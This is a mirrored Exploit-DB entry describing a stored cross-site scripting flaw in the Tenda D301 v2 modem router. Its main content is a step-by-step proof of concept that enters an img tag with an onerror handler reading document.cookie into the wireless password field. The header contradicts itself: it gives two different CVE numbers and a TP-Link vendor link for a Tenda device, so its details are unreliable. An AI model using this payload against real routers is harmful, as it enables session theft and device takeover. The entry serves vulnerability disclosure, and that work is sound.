Tenda D301 v2 Modem Router – Persistent Cross-Site Scripting

• Exploit Database
• 13 阅读

• 作者： ABDO10
  日期： 2019-07-12
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47107/

• # Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
  # Exploit Author: ABDO10
  # Date : July, 11th 2019
  # Product : Tenda D301 v2Modem Router
  # version : v2
  # Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
  # Tested on: Linux
  # CVE : 2019-13491
  
  
  # Poc Instructions :
  /*******************************************************************************************************************/
  > 1 - Open modem routeron web browser default(192.168.1.1)
  > 2 - Click on advanced -> Wireless -> Security
  > 3 - fill this payload : <img src="https://www.exploit-db.com/exploits/47107/xy" OnError=prompt(document.cookie)>as password
  > 4 - Click on "click to display"
  /*******************************************************************************************************************/